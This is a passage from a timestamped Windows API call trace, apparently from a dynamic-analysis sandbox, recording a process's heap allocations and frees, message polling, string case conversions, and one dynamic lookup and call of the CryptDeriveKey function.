Flags=0x0, Size=0x4) returned 0x24b1698 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0209.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0209.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0209.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0209.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0209.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0209.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0209.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0209.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0209.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0209.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0209.766] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab20 [0209.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.767] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.768] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.769] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.769] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.769] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.769] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.773] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0209.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0209.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.775] CryptDeriveKey (in: hProv=0xad27a8, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 